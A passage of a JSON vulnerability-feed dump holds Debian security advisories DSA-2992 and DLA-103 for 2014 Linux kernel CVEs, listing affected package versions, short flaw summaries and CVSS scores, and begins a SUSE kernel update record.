"linux-image-3.2.0-5-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-all-armel_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-all-armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-vexpress_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-vexpress", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-mv78xx0_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-mv78xx0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-orion5x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-orion5x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-mx5_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-mx5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-rt-686-pae-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-rt-686-pae-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-kirkwood_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-kirkwood", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "xen-linux-system-3.2.0-4-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "xen-linux-system-3.2.0-4-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-all-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-all-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-omap_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-omap", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "xen-linux-system-3.2.0-5-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "xen-linux-system-3.2.0-5-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-rt-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-rt-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-rt-amd64-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-rt-amd64-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-mx5_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-mx5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-mv78xx0_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-mv78xx0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-486_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-486", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-versatile_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-versatile", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-kirkwood_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-kirkwood", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-all-i386_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-all-i386", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-rt-amd64-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-rt-amd64-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-versatile_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-versatile", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-versatile_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-versatile", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-all-i386_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-all-i386", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-all-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-all-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-orion5x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-orion5x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-common-rt_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-common-rt", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-ixp4xx_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-ixp4xx", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-all_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux_3.2.60-1+deb7u3_all.deb", "packageName": "linux", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-orion5x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-orion5x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-rt-686-pae-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-rt-686-pae-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-common_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-common", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-libc-dev_3.2.60-1+deb7u3_all.deb", "packageName": "linux-libc-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-486_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-486", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-686-pae-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-686-pae-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-mx5_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-mx5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-rt-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-rt-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-vexpress_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-vexpress", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-ixp4xx_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-ixp4xx", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-ixp4xx_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-ixp4xx", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-orion5x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-orion5x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-amd64-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-amd64-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-amd64-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-amd64-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-iop32x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-iop32x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-common_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-common", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-all-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-all-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-mv78xx0_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-mv78xx0", "operator": "lt"}], "description": "Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation:\n\n * [CVE-2014-3534](<https://security-tracker.debian.org/tracker/CVE-2014-3534>)\n\nMartin Schwidefsky of IBM discovered that the ptrace subsystem does not properly sanitize the psw mask value. On s390 systems, an unprivileged local user could use this flaw to set address space control bits to kernel space combination and thus gain read/write access to kernel memory.\n\n * [CVE-2014-4667](<https://security-tracker.debian.org/tracker/CVE-2014-4667>)\n\nGopal Reddy Kodudula of Nokia Siemens Networks discovered that the sctp_association_free function does not properly manage a certain backlog value, which allows remote attackers to cause a denial of service (socket outage) via a crafted SCTP packet.\n\n * [CVE-2014-4943](<https://security-tracker.debian.org/tracker/CVE-2014-4943>)\n\nSasha Levin discovered a flaw in the Linux kernel's point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). An unprivileged local user could use this flaw for privilege escalation.\n\nFor the stable distribution (wheezy), these problems have been fixed in version 3.2.60-1+deb7u3.\n\nFor the unstable distribution (sid), these problems have been fixed in version 3.14.13-2.\n\nWe recommend that you upgrade your linux packages.", "edition": 3, "reporter": "Debian", "published": "2014-07-29T00:00:00", "title": "linux -- security update", "type": "debian", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-4943", "CVE-2014-3534", "CVE-2014-4667"], "modified": "2014-07-29T00:00:00", "id": "DSA-2992", "href": "http://www.debian.org/security/dsa-2992", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T12:57:25", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "6", "packageVersion": "2.6.32-48squeeze9", "arch": "all", "packageFilename": "linux-2.6_2.6.32-48squeeze9_all.deb", "packageName": "linux-2.6", "operator": "lt"}], "description": "This security upload has been prepared in cooperation of the Debian Kernel, Security and LTS Teams and features the upstream stable release 2.6.32.64 (see <https://lkml.org/lkml/2014/11/23/181> for more information for that). It fixes the CVEs described below. \n\n**Note**: if you are using the openvz flavors, please consider three things: a.) we haven't got any feedback on them (while we have for all other flavors) b.) so do your test before deploying them and c.) once you have done so, please give feedback to debian-lts@lists.debian.org.\n\nIf you are not using openvz flavors, please still consider b+c :-)\n\n * [CVE-2012-6657](<https://security-tracker.debian.org/tracker/CVE-2012-6657>)\n\nFix the sock_setsockopt function to prevent local users from being able to cause a denial of service (system crash) attack.\n\n * [CVE-2013-0228](<https://security-tracker.debian.org/tracker/CVE-2013-0228>)\n\nFix a XEN priviledge escalation, which allowed guest OS users to gain guest OS priviledges.\n\n * [CVE-2013-7266](<https://security-tracker.debian.org/tracker/CVE-2013-7266>)\n\nFix the mISDN_sock_recvmsg function to prevent local users from obtaining sensitive information from kernel memory.\n\n * [CVE-2014-4157](<https://security-tracker.debian.org/tracker/CVE-2014-4157>)\n\nMIPS platform: prevent local users from bypassing intended PR_SET_SECCOMP restrictions.\n\n * [CVE-2014-4508](<https://security-tracker.debian.org/tracker/CVE-2014-4508>)\n\nPrevent local users from causing a denial of service (OOPS and system crash) when syscall auditing is enabled .\n\n * [CVE-2014-4653](<https://security-tracker.debian.org/tracker/CVE-2014-4653>)\n\n[CVE-2014-4654](<https://security-tracker.debian.org/tracker/CVE-2014-4654>) [CVE-2014-4655](<https://security-tracker.debian.org/tracker/CVE-2014-4655>)\n\nFix the ALSA control implementation to prevent local users from causing a denial of service attack and from obtaining sensitive information from kernel memory.\n\n * [CVE-2014-4943](<https://security-tracker.debian.org/tracker/CVE-2014-4943>)\n\nFix PPPoL2TP feature to prevent local users to from gaining privileges.\n\n * [CVE-2014-5077](<https://security-tracker.debian.org/tracker/CVE-2014-5077>)\n\nPrevent remote attackers from causing a denial of service attack involving SCTP.\n\n * [CVE-2014-5471](<https://security-tracker.debian.org/tracker/CVE-2014-5471>)\n\n[CVE-2014-5472](<https://security-tracker.debian.org/tracker/CVE-2014-5472>)\n\nFix the parse_rock_ridge_inode_internal function to prevent local users from causing a denial of service attack via a crafted iso9660 images.\n\n * [CVE-2014-9090](<https://security-tracker.debian.org/tracker/CVE-2014-9090>)\n\nFix the do_double_fault function to prevent local users from causing a denial of service (panic) attack.\n\nFor Debian 6 Squeeze, these issues have been fixed in linux-2.6 version 2.6.32-48squeeze9", "edition": 1, "reporter": "Debian", "published": "2014-12-09T00:00:00", "title": "linux-2.6 -- LTS security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5077", "CVE-2013-0228", "CVE-2014-4157", "CVE-2014-4655", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-4653", "CVE-2013-7266", "CVE-2014-5472", "CVE-2014-4654", "CVE-2012-6657", "CVE-2014-5471"], "modified": "2014-12-09T00:00:00", "id": "DLA-103", "href": "http://www.debian.org/security/2014/dla-103", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:08:53", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=866911", "http://download.suse.com/patch/finder/?keywords=1439dbce4e4c9644db358f7531923fbe", "https://bugzilla.suse.com/show_bug.cgi?id=891087", "http://download.suse.com/patch/finder/?keywords=fe96acccaeb363ead4fc832ed39f05b7", "https://bugzilla.suse.com/show_bug.cgi?id=855657", "https://bugzilla.suse.com/show_bug.cgi?id=860593", "https://bugzilla.suse.com/show_bug.cgi?id=887418", "https://bugzilla.suse.com/show_bug.cgi?id=806990", "http://download.suse.com/patch/finder/?keywords=1a668c9859986c2300a5f27acf2d3be9", "https://bugzilla.suse.com/show_bug.cgi?id=893596", "https://bugzilla.suse.com/show_bug.cgi?id=879304", "https://bugzilla.suse.com/show_bug.cgi?id=882317", "http://download.suse.com/patch/finder/?keywords=4af5f794a265afdfe45a95f7032b5e85", "https://bugzilla.suse.com/show_bug.cgi?id=879921", "https://bugzilla.suse.com/show_bug.cgi?id=883376", "https://bugzilla.suse.com/show_bug.cgi?id=888105", "https://bugzilla.suse.com/show_bug.cgi?id=892200", "https://bugzilla.suse.com/show_bug.cgi?id=880370", "https://bugzilla.suse.com/show_bug.cgi?id=887645", "https://bugzilla.suse.com/show_bug.cgi?id=896689", "https://bugzilla.suse.com/show_bug.cgi?id=895983", "https://bugzilla.suse.com/show_bug.cgi?id=876017", "https://bugzilla.suse.com/show_bug.cgi?id=888849", "https://bugzilla.suse.com/show_bug.cgi?id=884333", "https://bugzilla.suse.com/show_bug.cgi?id=890526", "https://bugzilla.suse.com/show_bug.cgi?id=871134", "https://bugzilla.suse.com/show_bug.cgi?id=849123", "https://bugzilla.suse.com/show_bug.cgi?id=880344", "https://bugzilla.suse.com/show_bug.cgi?id=826486", "https://bugzilla.suse.com/show_bug.cgi?id=888968", "https://bugzilla.suse.com/show_bug.cgi?id=885262", "https://bugzilla.suse.com/show_bug.cgi?id=888607", "https://bugzilla.suse.com/show_bug.cgi?id=866615", "https://bugzilla.suse.com/show_bug.cgi?id=881759", "https://bugzilla.suse.com/show_bug.cgi?id=888058", "http://download.suse.com/patch/finder/?keywords=9f2f8b759827a980e4f998aef659fa08", "https://bugzilla.suse.com/show_bug.cgi?id=884725", "https://bugzilla.suse.com/show_bug.cgi?id=882804", "https://bugzilla.suse.com/show_bug.cgi?id=894200", "https://bugzilla.suse.com/show_bug.cgi?id=866130", "https://bugzilla.suse.com/show_bug.cgi?id=889061", "https://bugzilla.suse.com/show_bug.cgi?id=833820", "https://bugzilla.suse.com/show_bug.cgi?id=885382", "https://bugzilla.suse.com/show_bug.cgi?id=871797", "https://bugzilla.suse.com/show_bug.cgi?id=866864", "https://bugzilla.suse.com/show_bug.cgi?id=893064", "https://bugzilla.suse.com/show_bug.cgi?id=859840", "https://bugzilla.suse.com/show_bug.cgi?id=876055", "http://download.suse.com/patch/finder/?keywords=9a4508f548dca82be59620eeabed6a12", "https://bugzilla.suse.com/show_bug.cgi?id=816708", "https://bugzilla.suse.com/show_bug.cgi?id=887082", "https://bugzilla.suse.com/show_bug.cgi?id=885509", "https://bugzilla.suse.com/show_bug.cgi?id=887680", "https://bugzilla.suse.com/show_bug.cgi?id=876114", "https://bugzilla.suse.com/show_bug.cgi?id=895680", "http://download.suse.com/patch/finder/?keywords=c2937e35f763f2736ed1acf1055ec575", "https://bugzilla.suse.com/show_bug.cgi?id=893496", "https://bugzilla.suse.com/show_bug.cgi?id=892723", "https://bugzilla.suse.com/show_bug.cgi?id=889173", "https://bugzilla.suse.com/show_bug.cgi?id=883096", "https://bugzilla.suse.com/show_bug.cgi?id=885422", "https://bugzilla.suse.com/show_bug.cgi?id=774818", "https://bugzilla.suse.com/show_bug.cgi?id=882900", "https://bugzilla.suse.com/show_bug.cgi?id=884767", "http://download.suse.com/patch/finder/?keywords=5e4143f9e1829ed4b39a7eccffaa4cf3", "https://bugzilla.suse.com/show_bug.cgi?id=884582", "https://bugzilla.suse.com/show_bug.cgi?id=887608", "https://bugzilla.suse.com/show_bug.cgi?id=889727", "http://download.suse.com/patch/finder/?keywords=ec3b4fdfc28b3e5b31314cd6b64cee6f", "https://bugzilla.suse.com/show_bug.cgi?id=886840", "https://bugzilla.suse.com/show_bug.cgi?id=891281", "https://bugzilla.suse.com/show_bug.cgi?id=892490", "https://bugzilla.suse.com/show_bug.cgi?id=891259", "https://bugzilla.suse.com/show_bug.cgi?id=869055", "https://bugzilla.suse.com/show_bug.cgi?id=888591", "https://bugzilla.suse.com/show_bug.cgi?id=891619", "https://bugzilla.suse.com/show_bug.cgi?id=888847", "https://bugzilla.suse.com/show_bug.cgi?id=889614", "https://bugzilla.suse.com/show_bug.cgi?id=895221", "https://bugzilla.suse.com/show_bug.cgi?id=860441", "https://bugzilla.suse.com/show_bug.cgi?id=883724", "https://bugzilla.suse.com/show_bug.cgi?id=832309", "https://bugzilla.suse.com/show_bug.cgi?id=880892", "https://bugzilla.suse.com/show_bug.cgi?id=883518", "https://bugzilla.suse.com/show_bug.cgi?id=881051", "https://bugzilla.suse.com/show_bug.cgi?id=876590", "https://bugzilla.suse.com/show_bug.cgi?id=890513", "https://bugzilla.suse.com/show_bug.cgi?id=887503", "http://download.suse.com/patch/finder/?keywords=81ea8f0b23808daa3ce30dda8a9f5765", "http://download.suse.com/patch/finder/?keywords=01c0bdf9329bf1fbfc034fc009538fd3", "https://bugzilla.suse.com/show_bug.cgi?id=882639", "https://bugzilla.suse.com/show_bug.cgi?id=889451", "https://bugzilla.suse.com/show_bug.cgi?id=890297", "https://bugzilla.suse.com/show_bug.cgi?id=891746", "https://bugzilla.suse.com/show_bug.cgi?id=870161", "https://bugzilla.suse.com/show_bug.cgi?id=869934", "https://bugzilla.suse.com/show_bug.cgi?id=863586", "https://bugzilla.suse.com/show_bug.cgi?id=895608", "https://bugzilla.suse.com/show_bug.cgi?id=890426"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-base-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-xen-base", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "4.2.4_04_3.0.101_0.40-0.7.3", "packageFilename": "xen-kmp-pae-4.2.4_04_3.0.101_0.40-0.7.3.i586.rpm", "packageName": "xen-kmp-pae", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-ppc64-devel-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-ppc64-devel", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-trace", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-base-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-trace-base", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "3.0.101.rt130-0.28.1", "packageFilename": "kernel-rt_trace-devel-3.0.101.rt130-0.28.1.x86_64.rpm", "packageName": "kernel-rt_trace-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-extra-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default-extra", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-trace-2_3.0.101_0.40-0.16.104.ia64.rpm", "packageName": "gfs2-kmp-trace", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "2.1.1_3.0.101_rt130_0.28-0.11.75", "packageFilename": "lttng-modules-kmp-rt-2.1.1_3.0.101_rt130_0.28-0.11.75.x86_64.rpm", "packageName": "lttng-modules-kmp-rt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-ec2-base-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-ec2-base", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-trace-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-ec2-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-ec2-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", 